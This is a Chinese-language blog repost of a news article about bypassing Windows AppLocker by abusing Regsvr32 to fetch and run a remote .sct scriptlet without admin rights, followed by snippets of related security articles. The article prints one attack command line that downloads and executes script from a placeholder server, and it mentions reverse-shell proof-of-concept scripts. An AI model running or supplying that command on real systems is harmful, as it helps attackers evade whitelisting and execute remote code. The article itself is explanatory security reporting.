Windows AppLocker被绕过:攻击者可不提权联网注入DLL

最新推荐文章于 2024-09-20 20:44:35 发布
最新推荐文章于 2024-09-20 20:44:35 发布
阅读量133 收藏
点赞数
文章标签: shell
原文链接:https://yq.aliyun.com/articles/171552
版权

AppLocker是Windows 7和Windows Server 2008 R2中引入的一项安全功能,旨在帮助管理员们指定哪个用户或用户组能够访问/运行某一个文件。然而据外媒报道,已经有人找到了利用Windows系统中Regsvr32命令行工具的某个隐藏特性,来绕过Windows AppLocker安全措施并正常注册动态链接库(DLLs)的方法。

20160422042214164.png

Regsvr32则是一款可被安装工具(或批处理脚本)使用,以便快速注册动态链接库的脚本工具。

照理说,微软既然把这款“中性”而又危险的工具留在系统中,就应该管好它不被管理员之外的人所滥用。但遗憾的是,我们几乎不可能检测到这种类型的攻击。

据安全研究人员Casey Smith所述,当攻击者在某台受感染的工作站上立足之后,就可以滥用Regsvr32、通过网络下载一个COM脚本程序(.sct文件),然后在本地机器上注册一个DLL。

更糟糕的是,攻击者甚至无需取得管理员权限。Regsvr32可借助代理和TLS连接、重定向等功能,并且它拥有微软自家的证书,所以可以执行任何看似正常的背景活动命令。

下面是标准的Regsvr32参数、以及而已命令的对比:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith还指出,“regsvr32能够接收的脚本网址没有很好的记录,要触发这一‘旁路’,可以把内置VB和JS元素的代码块放进去”。

在进一步的测试中,研究人员还在GitHub上放出了系统管理员能够下载的“概念验证脚本”(通过Regsvr32并打开一个后门、或者基于HTTP的反向shell)。

从理论上来说,这种类型的“漏洞”允许攻击者访问注册所有DLL,然后在被感染的计算机上执行恶意代码,更别说管理员权限了。



本文转自d1net(转载)

weixin_33796205
关注
Windows 7 新功能 - AppLocker
老陈醋的博客
02-15 591
Windows 7 新功能 - AppLocker
Windows Defender 绕过(RTO I Lab环境实测)
0pr
12-17 1538
这篇文章尝试了一下在 PEN300 课程之外的环境里面,Windows Defender 绕过的应用效果。在 RTO Lab 中看了一下 WD 的 Exclusion 设置,并没有添加任何文件和文件夹。意味着 WD 的运行应该就是真实环境中的那样,并没有任何干预。之后,再次用相同的 Payload 在 Data Center 2022 上做了一样的测试。Cobalt Strike 生成的被检测到并删除,而我们的 Payload 健在。
Windows 7的AppLocker功能解析
Digital_Wings的专栏
01-27 1150
AppLocker即所谓的“应用程序控制策略”,是Windows 7系统中新增加的一项安全功能。利用AppLocker管理员可以非常方便地进行配置,以实现用户可在计算机上可运行哪些程序、安装哪些文件、运行哪些脚本。由于AppLocker是基于组策略管理和配置的,因此我们可以非常方便地将其部署到整个网络环境中,可谓一劳永逸。下面笔者结合实例对这一功能进行测试和解析。 1、牛刀小试 我们以管理员身份登录系统,默认情况下该用户可以运行所有的程序、脚本和没有限制地进行软件的安装。下面我们进行一个演示:在D盘根目
多维度对抗 Windows AppLocker
UKK
06-18 243
多维度对抗 Windows AppLocker http://www.ifind.cc/view/221
如何在 Windows 中使用 AppLocker 阻止应用程序运行
winkexin的博客
07-06 2030
AppLocker 是一些 Microsoft 产品的内置实用程序,包括一些 Windows 和 Server 版本。它用于控制哪些应用程序和程序可以在您的系统上运行,包括可执行 (.exe) 文件、脚本、Windows Installer 文件、打包应用程序(Microsoft Store 应用程序)等。AppLocker 用于定义允许或阻止与应用关联的 .exe 或 .com 文件的规则。默认情况下,由于没有配置规则,所有应用程序都可以正常运行。目的名称组路径。
UltimateAppLockerByPassList:此存储库的目标是记录绕过AppLocker的最常用技术
02-25
由于可以以不同的方式配置AppLocker,因此我维护一个经过验证的绕过列表(适用于默认的AppLocker规则)和一个具有可能的绕过技术的列表(取决于配置),或者声称是某人绕过的列表。 我还列出了通用的绕过技术以及要...
AppLocker-Guidance:使用AppLocker实施应用程序白名单的配置指南。 #nsacyber
02-06
- 对于外部来源的文件,优先考虑使用发布者规则,因为它们不易被绕过。 - 对于内部开发的应用,使用文件哈希规则提供更高的安全性。 - 不要完全依赖AppLocker,与其他安全措施如防病毒软件结合使用。 8. **挑战...
ansible-win-applocker:使用Ansible配置Windows AppLocker
05-01
Windows AppLocker的角色 在Windows系统上设置AppLocker(应用程序白名单)的角色。 要求和依存关系 Ansible 已在以下版本上进行了测试: 2.3(无法正常工作! =模板上传失败) 2.4 2.5b2 操作系统 在传送带中...
如何防范PowerShell代码注入漏洞绕过受限语言模式
09-21
### 如何防范PowerShell代码注入漏洞绕过受限语言模式 #### 一、PowerShell与受限语言模式概述 PowerShell作为一种强大的脚本语言,在Windows环境中扮演着重要的角色,它不仅可以用于自动化任务,还提供了丰富的...
locker批处理命令,隐藏文件并设置密码
03-13
不使用第三方软件,利用批处理命令实现对私密文件进行隐藏。该隐藏方式是将文件(夹)设置系统属性,一般不会有人把显示系统隐藏文件打开,所以不担心被别人看到。真正需要加密的文件不推荐使用。
Windows现漏洞 可绕过AppLocker白名单实施攻击
weixin_34218890的博客
07-03 106
安全研究人员发现,通过使用Windows命令行使用程序(可追溯到Windows XP),基于Windows AppLocker的应用白名单保护可以被绕过。当结合托管在远程主机上的脚本时,这个漏洞可允许攻击者运行不在Windows AppLocker白名单中的软件。 Windows现漏洞 可绕过AppLocker白名单实施攻击 根据微软表示,这个使用程序R...
设定Applocker和解决问题
oLinYu12的博客
08-23 638
创建默认规则 创建可执行规则,最好使用发布者模式 创建封装应用规则,不添加此规则将导致开始菜单锁死的问题。 勾选可执行规则和封装应用规则配置强制规则 使用命令行设定appidsvc服务为自启动 将默认的允许所有文件改为everyone,否则除指定的windows文件夹和programfiles文件夹都被锁定。 重启计算机后仅设定应用被锁定,注意applocker服务是否已启动。 如遇到问题可以查看applocker日志,通过日志创建排除规则。
关于win7禁止标准用户安装软件 AppLocker使用
热门推荐
yanchenyu365的博客
10-23 1万+
应该每个人都深有体会,很多大叔大妈级的用户,都经不起各种软件或网页弹窗的诱导,他们很容易在自己不知道的情况下,安装了N个浏览器,N个播放器,N个安全卫士,N个下载软件等等,导致电脑卡、慢、死。我弟弟学校老师们就是这个情况,找到我“修电脑”,一开机桌面一堆图标,我问:怎么装这么多软件。答:我也不知道怎么装上的。花了很长时间卸载那些行功能重复的软件,我这样清理一下也只管一时啊... ...
LockerGoga勒索软件家族分析
粉枪
05-02 620
本文介绍对多个LockerGoga不同样本的分析,描述勒索软件工作的原理以及如何应对。 发现勒索软件家族LockerGoga加入了新的特征来加密受害者文件,并要求受害者支付赎金才可以解密。 技术分析 LockerGoga是一款非常特别的勒索软件,分析发现与其他勒索软件家族相比,它有一些独特的函数和功能。 分析LockerGoga不同样本发现,LockerGoga与其他勒索软件家族的不同包括...
绕过AppLocker系列之控制面板的利用
weixin_34224941的博客
09-13 178
本文讲的是绕过AppLocker系列之控制面板的利用,使用默认规则实现AppLocker不能提供任何充分的保护,因为通过使用合法的Windows二进制文件和利用常见的系统错误配置就会产生多个绕过方法。在Windows系统中,当用户打开控制面板时,会加载多个CPL文件。这些CPL文件的列表是从注册表中获得的。 Francesco Mifsud发现,...
关于dll注入与卸载遇到的坑,记录下
xie_zhao的博客
12-20 2900
  dll注入和卸载关键函数CreateRemoteThread、VirtualAllocEx、WriteProcessMemory.一开始使用的时候,直接网上一搜代码拷贝直接用,这就导致了各种问题.在此记录下. 1.在dll注入的时候,dll路径导致注入失败.其实就是 目标进程找不到dll,简单点使用绝对路径就行.(需要注意的是,这个路径你要让目标进程找得到.这就需要使用VirtualAllo...
【C高级】有关shell脚本的一些练习
最新发布
2301_77133426的博客
09-20 185
4、复制/etc/shadow到此目录,并重命名为test。5、把dir2打包并压缩为dir2.tar.xz。4、把当前目录下的所有脚本文件拷贝到dir2中。6、再把dir2.tar.xz移动到dir1中。1、显示/etc/group文件中第五行的内容。2、创建目录/home/ubuntu/copy。5、将当前目录中test的所属用户改为root。6、将test中其他用户的权限改为没有任何权限。3、把当前目录下的所有文件拷贝到dir1中,1、在家目录下创建目录文件,dir。7、解压dir1中的压缩包。
Windows 7实用技巧大揭秘:从问题步骤记录器到AppLocker
"Windows 7的50个使用小诀窍" Windows 7作为一个深受用户喜爱的操作系统,提供了许多实用的特性与技巧,可以帮助用户更高效地管理和使用计算机。以下是一些亮点介绍: 1、问题步骤记录器(Problem Steps Recorder...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值